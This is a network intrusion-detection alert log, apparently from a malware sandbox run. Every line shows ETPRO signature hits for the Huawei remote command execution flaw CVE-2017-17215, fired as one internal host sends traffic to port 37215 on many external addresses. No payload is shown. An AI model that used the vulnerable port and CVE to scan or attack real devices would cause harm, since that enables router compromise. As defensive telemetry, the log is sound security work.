                                                        06/13/24-21:32:17.695199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4776037215192.168.2.14156.174.100.66
                                                        06/13/24-21:32:34.192271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4973837215192.168.2.1441.117.66.57
                                                        06/13/24-21:33:13.229628TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4599237215192.168.2.14197.225.130.223
                                                        06/13/24-21:33:17.307077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3618637215192.168.2.1441.102.228.203
                                                        06/13/24-21:32:13.546746TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5912837215192.168.2.1441.221.39.240
                                                        06/13/24-21:32:15.607963TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5961837215192.168.2.14156.118.112.87
                                                        06/13/24-21:32:11.509005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4256837215192.168.2.14197.199.168.37
                                                        06/13/24-21:32:19.726873TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5565837215192.168.2.14197.178.183.168
                                                        06/13/24-21:32:42.422150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4150837215192.168.2.1441.249.27.158
                                                        06/13/24-21:32:36.269172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3709237215192.168.2.1441.198.233.179
                                                        06/13/24-21:32:42.409088TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5718637215192.168.2.1441.147.180.97
                                                        06/13/24-21:33:07.056832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3389237215192.168.2.1441.21.109.98
                                                        06/13/24-21:33:04.991143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3454637215192.168.2.14156.66.204.103
                                                        06/13/24-21:32:13.564706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5829637215192.168.2.1441.151.126.188
                                                        06/13/24-21:32:32.152995TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5501637215192.168.2.1441.209.195.100
                                                        06/13/24-21:32:46.528039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5555237215192.168.2.1441.185.248.45
                                                        06/13/24-21:32:11.509214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3763437215192.168.2.1441.14.227.207
                                                        06/13/24-21:33:15.276477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3741437215192.168.2.1441.13.219.110
                                                        06/13/24-21:33:02.911373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5671837215192.168.2.14197.77.213.102
                                                        06/13/24-21:32:32.168976TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5510037215192.168.2.14197.3.97.174
                                                        06/13/24-21:32:44.479797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4915237215192.168.2.14156.245.147.29
                                                        06/13/24-21:32:15.609950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5083237215192.168.2.1441.168.48.220
                                                        06/13/24-21:31:57.154233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5282237215192.168.2.14156.254.10.207
                                                        06/13/24-21:32:03.298625TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5951037215192.168.2.1441.78.129.83
                                                        06/13/24-21:32:19.731601TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5394437215192.168.2.1441.182.237.241
                                                        06/13/24-21:33:13.213991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5571837215192.168.2.14197.216.43.20
                                                        06/13/24-21:33:04.992736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3811037215192.168.2.14197.59.159.11
                                                        06/13/24-21:32:17.695610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4936837215192.168.2.14156.156.151.152
                                                        06/13/24-21:32:19.749841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3639037215192.168.2.14156.123.78.173
                                                        06/13/24-21:33:00.870442TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4017037215192.168.2.1441.207.58.145
                                                        06/13/24-21:32:54.710635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3775437215192.168.2.14156.211.72.27
                                                        06/13/24-21:33:05.013029TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5749237215192.168.2.1441.63.77.229
                                                        06/13/24-21:32:36.263126TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3591637215192.168.2.14156.40.124.64
                                                        06/13/24-21:32:54.711514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3717237215192.168.2.1441.96.177.13
                                                        06/13/24-21:33:07.042614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5428237215192.168.2.14197.151.204.76
                                                        06/13/24-21:32:42.423554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5294037215192.168.2.1441.7.168.16
                                                        06/13/24-21:32:52.679907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3845837215192.168.2.14197.125.9.160
                                                        06/13/24-21:33:05.017070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5825437215192.168.2.14197.127.229.45
                                                        06/13/24-21:31:59.197408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5186237215192.168.2.14197.36.55.1
                                                        06/13/24-21:32:40.379902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3312037215192.168.2.14156.75.33.23
                                                        06/13/24-21:33:09.088985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4061237215192.168.2.14197.252.193.125
                                                        06/13/24-21:32:17.678950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4082037215192.168.2.14156.180.49.48
                                                        06/13/24-21:33:15.276165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3788437215192.168.2.14156.245.144.104
                                                        06/13/24-21:32:58.841704TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5223837215192.168.2.1441.175.49.71
                                                        06/13/24-21:32:28.027361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3922237215192.168.2.1441.9.195.12
                                                        06/13/24-21:33:05.017030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4887237215192.168.2.1441.172.125.67
                                                        06/13/24-21:31:57.091427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4062037215192.168.2.14156.109.2.30
                                                        06/13/24-21:32:32.165809TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4053837215192.168.2.14156.245.125.42
                                                        06/13/24-21:32:19.730245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3972237215192.168.2.14197.71.187.109
                                                        06/13/24-21:32:19.749072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5930837215192.168.2.14197.111.75.179
                                                        06/13/24-21:32:19.749156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5332037215192.168.2.1441.5.208.27
                                                        06/13/24-21:31:59.174094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5516237215192.168.2.14156.17.97.42
                                                        06/13/24-21:32:48.552301TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3317237215192.168.2.1441.173.65.101
                                                        06/13/24-21:31:59.176205TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5486237215192.168.2.14156.75.209.109
                                                        06/13/24-21:32:42.404379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3544037215192.168.2.14156.235.201.169
                                                        06/13/24-21:32:03.279322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4114037215192.168.2.1441.222.216.67
                                                        06/13/24-21:32:32.156417TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3505037215192.168.2.1441.252.36.58
                                                        06/13/24-21:32:44.450363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5295837215192.168.2.14156.250.156.243
                                                        06/13/24-21:32:30.128952TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5136437215192.168.2.14156.239.0.104
                                                        06/13/24-21:33:09.130232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4270837215192.168.2.14197.22.152.212
                                                        06/13/24-21:33:04.993097TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5238837215192.168.2.14197.59.19.251
                                                        06/13/24-21:32:19.753766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4861237215192.168.2.14156.0.253.212
                                                        06/13/24-21:33:13.228245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5011037215192.168.2.14197.38.139.79
                                                        06/13/24-21:32:32.150649TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4076837215192.168.2.1441.118.225.132
                                                        06/13/24-21:32:44.455214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5658637215192.168.2.1441.248.94.212
                                                        06/13/24-21:32:54.708877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4969837215192.168.2.14156.35.149.185
                                                        06/13/24-21:32:07.402321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5140637215192.168.2.14156.19.193.150
                                                        06/13/24-21:32:50.631968TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3756837215192.168.2.14197.63.211.132
                                                        06/13/24-21:32:58.822024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3849637215192.168.2.14156.176.135.162
                                                        06/13/24-21:32:23.943321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4000037215192.168.2.14156.118.190.208
                                                        06/13/24-21:32:13.564959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4396837215192.168.2.1441.127.205.195
                                                        06/13/24-21:32:46.509157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3751037215192.168.2.14197.224.223.250
                                                        06/13/24-21:33:02.913077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4913037215192.168.2.1441.33.1.47
                                                        06/13/24-21:32:28.028827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5857037215192.168.2.14156.11.240.240
                                                        06/13/24-21:32:03.299196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4650237215192.168.2.14197.32.214.232
                                                        06/13/24-21:33:00.870319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4203037215192.168.2.14156.243.96.3
                                                        06/13/24-21:32:32.151858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5945037215192.168.2.1441.112.37.31
                                                        06/13/24-21:31:57.092250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3998037215192.168.2.14156.254.160.136
                                                        06/13/24-21:32:42.409479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5186637215192.168.2.1441.80.101.7
                                                        06/13/24-21:32:40.377302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4542437215192.168.2.1441.197.115.118
                                                        06/13/24-21:32:56.756139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4616437215192.168.2.14156.8.118.85
                                                        06/13/24-21:33:00.865956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5476237215192.168.2.14197.193.67.171
                                                        06/13/24-21:32:34.197667TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5191037215192.168.2.14156.86.160.137
                                                        06/13/24-21:33:07.057334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3923437215192.168.2.14197.112.28.27
                                                        06/13/24-21:32:25.996469TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4534437215192.168.2.14197.5.139.59
                                                        06/13/24-21:32:40.374446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5761237215192.168.2.1441.47.141.84
                                                        06/13/24-21:32:07.417899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5201037215192.168.2.14156.88.182.121
                                                        06/13/24-21:32:38.321178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4607837215192.168.2.1441.208.182.178
                                                        06/13/24-21:32:58.843558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5835037215192.168.2.14197.80.73.183
                                                        06/13/24-21:33:02.914510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5336637215192.168.2.14156.211.251.13
                                                        06/13/24-21:32:48.572803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5691437215192.168.2.1441.45.147.112
                                                        06/13/24-21:32:56.789333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5616437215192.168.2.14197.69.220.233
                                                        06/13/24-21:32:32.152278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3489037215192.168.2.1441.33.35.235
                                                        06/13/24-21:33:09.090676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5710037215192.168.2.14156.199.229.228
                                                        06/13/24-21:31:57.091870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3981437215192.168.2.14156.231.38.101
                                                        06/13/24-21:32:32.169559TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4169037215192.168.2.14156.150.200.162
                                                        06/13/24-21:32:19.729706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4330037215192.168.2.1441.0.63.98
                                                        06/13/24-21:32:50.632811TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5930437215192.168.2.14197.91.108.196
                                                        06/13/24-21:32:46.526063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5878437215192.168.2.14197.196.66.17
                                                        06/13/24-21:32:38.322177TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4968037215192.168.2.14197.130.88.88
                                                        06/13/24-21:33:11.157111TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5139837215192.168.2.1441.98.61.4
                                                        06/13/24-21:32:11.488691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4383837215192.168.2.14156.41.240.175
                                                        06/13/24-21:33:09.101896TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3926837215192.168.2.14156.77.122.243
                                                        06/13/24-21:32:40.372640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4351437215192.168.2.14197.78.2.92
                                                        06/13/24-21:31:59.195314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5623437215192.168.2.1441.198.252.189
                                                        06/13/24-21:32:34.200004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4570637215192.168.2.14156.23.176.28
                                                        06/13/24-21:33:09.087655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4847037215192.168.2.14156.210.116.137
                                                        06/13/24-21:33:04.992413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3582837215192.168.2.14197.138.86.145
                                                        06/13/24-21:32:17.697227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5877637215192.168.2.1441.85.102.104
                                                        06/13/24-21:32:05.350703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5259237215192.168.2.1441.88.142.173
                                                        06/13/24-21:32:54.706839TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5871637215192.168.2.14156.38.126.139
                                                        06/13/24-21:32:30.100202TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5048837215192.168.2.14197.106.42.110
                                                        06/13/24-21:32:40.371764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6096037215192.168.2.14156.29.251.7
                                                        06/13/24-21:32:44.453233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4077237215192.168.2.1441.173.129.244
                                                        06/13/24-21:32:23.835512TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4931437215192.168.2.1441.217.13.122
                                                        06/13/24-21:32:36.247885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4642437215192.168.2.14156.104.101.168
                                                        06/13/24-21:33:09.106553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3762637215192.168.2.14156.198.117.97
                                                        06/13/24-21:32:50.632692TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4520037215192.168.2.1441.173.110.100
                                                        06/13/24-21:32:21.801857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3897837215192.168.2.14156.135.148.165
                                                        06/13/24-21:32:58.841506TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3702237215192.168.2.14197.47.152.181
                                                        06/13/24-21:33:05.014555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3596637215192.168.2.14156.219.133.42
                                                        06/13/24-21:32:48.553246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4367237215192.168.2.14197.52.132.232
                                                        06/13/24-21:32:58.839184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4612637215192.168.2.14156.224.137.174
                                                        06/13/24-21:33:09.112513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5703237215192.168.2.14156.47.117.29
                                                        06/13/24-21:32:32.151012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5534637215192.168.2.1441.249.148.187
                                                        06/13/24-21:32:36.264731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3828237215192.168.2.14197.214.127.32
                                                        06/13/24-21:32:52.669329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6077637215192.168.2.14156.118.25.10
                                                        06/13/24-21:32:36.266574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5116837215192.168.2.14197.210.58.250
                                                        06/13/24-21:32:52.677356TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3422637215192.168.2.14197.173.239.79
                                                        06/13/24-21:33:13.230994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5278237215192.168.2.14197.113.180.145
                                                        06/13/24-21:33:07.041908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4127037215192.168.2.14197.18.41.132
                                                        06/13/24-21:33:07.042545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4314437215192.168.2.1441.0.249.3
                                                        06/13/24-21:32:56.758027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5204037215192.168.2.14156.221.226.6
                                                        06/13/24-21:32:30.075445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3888837215192.168.2.1441.33.155.6
                                                        06/13/24-21:32:13.545809TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4383637215192.168.2.1441.162.129.119
                                                        06/13/24-21:32:25.992589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4967237215192.168.2.1441.7.60.55
                                                        06/13/24-21:32:42.422463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4182637215192.168.2.14197.12.139.126
                                                        06/13/24-21:33:04.990655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3813637215192.168.2.1441.243.33.136
                                                        06/13/24-21:33:13.211780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4169637215192.168.2.1441.208.246.85
                                                        06/13/24-21:32:52.669071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5809037215192.168.2.1441.10.182.75
                                                        06/13/24-21:33:13.227771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4432437215192.168.2.1441.249.15.9
                                                        06/13/24-21:32:42.404658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5344637215192.168.2.14156.255.68.105
                                                        06/13/24-21:32:30.100474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4457237215192.168.2.14197.229.158.246
                                                        06/13/24-21:32:03.275137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5891437215192.168.2.1441.165.251.84
                                                        06/13/24-21:32:13.546872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4811037215192.168.2.1441.119.168.53
                                                        06/13/24-21:32:36.244473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3974837215192.168.2.14197.67.228.129
                                                        06/13/24-21:32:15.609744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4132237215192.168.2.14197.152.159.232
                                                        06/13/24-21:32:30.094028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5067037215192.168.2.14156.8.110.29
                                                        06/13/24-21:32:17.694302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5114237215192.168.2.14156.170.149.175
                                                        06/13/24-21:32:32.151418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3837437215192.168.2.1441.69.175.189
                                                        06/13/24-21:32:48.571851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5458437215192.168.2.14156.202.72.104
                                                        06/13/24-21:32:36.266163TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5758237215192.168.2.14156.10.157.55
                                                        06/13/24-21:32:01.239770TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5711437215192.168.2.1441.7.165.176
                                                        06/13/24-21:32:15.610482TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4340037215192.168.2.14156.234.86.56
                                                        06/13/24-21:32:23.940564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3432037215192.168.2.1441.51.121.139
                                                        06/13/24-21:32:09.456966TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4175237215192.168.2.1441.232.190.165
                                                        06/13/24-21:33:09.090715TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5560237215192.168.2.1441.32.142.194
                                                        06/13/24-21:32:09.439310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4165837215192.168.2.1441.234.185.127
                                                        06/13/24-21:33:15.276239TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3407837215192.168.2.14156.71.105.26
                                                        06/13/24-21:32:30.075579TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3847437215192.168.2.14156.93.243.220
                                                        06/13/24-21:32:13.543408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4704037215192.168.2.14156.191.123.14
                                                        06/13/24-21:32:11.486117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3615037215192.168.2.14156.111.142.139
                                                        06/13/24-21:32:01.224632TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5879237215192.168.2.14197.193.22.49
                                                        06/13/24-21:32:40.354114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5403037215192.168.2.14197.93.65.189
                                                        06/13/24-21:32:46.503366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3757237215192.168.2.1441.40.128.79
                                                        06/13/24-21:32:40.358008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4861237215192.168.2.1441.0.233.85
                                                        06/13/24-21:31:59.174752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4175837215192.168.2.1441.134.28.73
                                                        06/13/24-21:32:15.607006TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3565637215192.168.2.14197.153.254.140
                                                        06/13/24-21:32:30.123453TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5397437215192.168.2.1441.70.47.149
                                                        06/13/24-21:32:42.408561TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4585037215192.168.2.14197.39.234.144
                                                        06/13/24-21:31:59.176969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4368837215192.168.2.1441.84.31.129
                                                        06/13/24-21:33:17.338867TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4359837215192.168.2.14156.146.219.103
                                                        06/13/24-21:32:05.370797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4411837215192.168.2.14197.97.13.212
                                                        06/13/24-21:32:28.027400TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5029237215192.168.2.14156.149.67.201
                                                        06/13/24-21:32:52.660355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5061837215192.168.2.1441.27.160.206
                                                        06/13/24-21:33:17.310192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4851437215192.168.2.14156.224.11.226
                                                        06/13/24-21:31:57.154266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6074437215192.168.2.14156.61.117.129
                                                        06/13/24-21:33:04.992515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4557237215192.168.2.1441.132.121.178
                                                        06/13/24-21:32:46.503450TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4782837215192.168.2.1441.27.62.138
                                                        06/13/24-21:32:56.757888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3681237215192.168.2.14197.15.195.239
                                                        06/13/24-21:32:11.507638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5648637215192.168.2.14197.125.155.108
                                                        06/13/24-21:32:28.026837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5335037215192.168.2.14197.247.129.164
                                                        06/13/24-21:32:17.674778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4445237215192.168.2.14197.149.70.142
                                                        06/13/24-21:32:19.731639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4927837215192.168.2.14156.226.225.181
                                                        06/13/24-21:32:19.752757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5157237215192.168.2.14197.120.145.209
                                                        06/13/24-21:32:30.099035TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5450437215192.168.2.14156.204.133.74
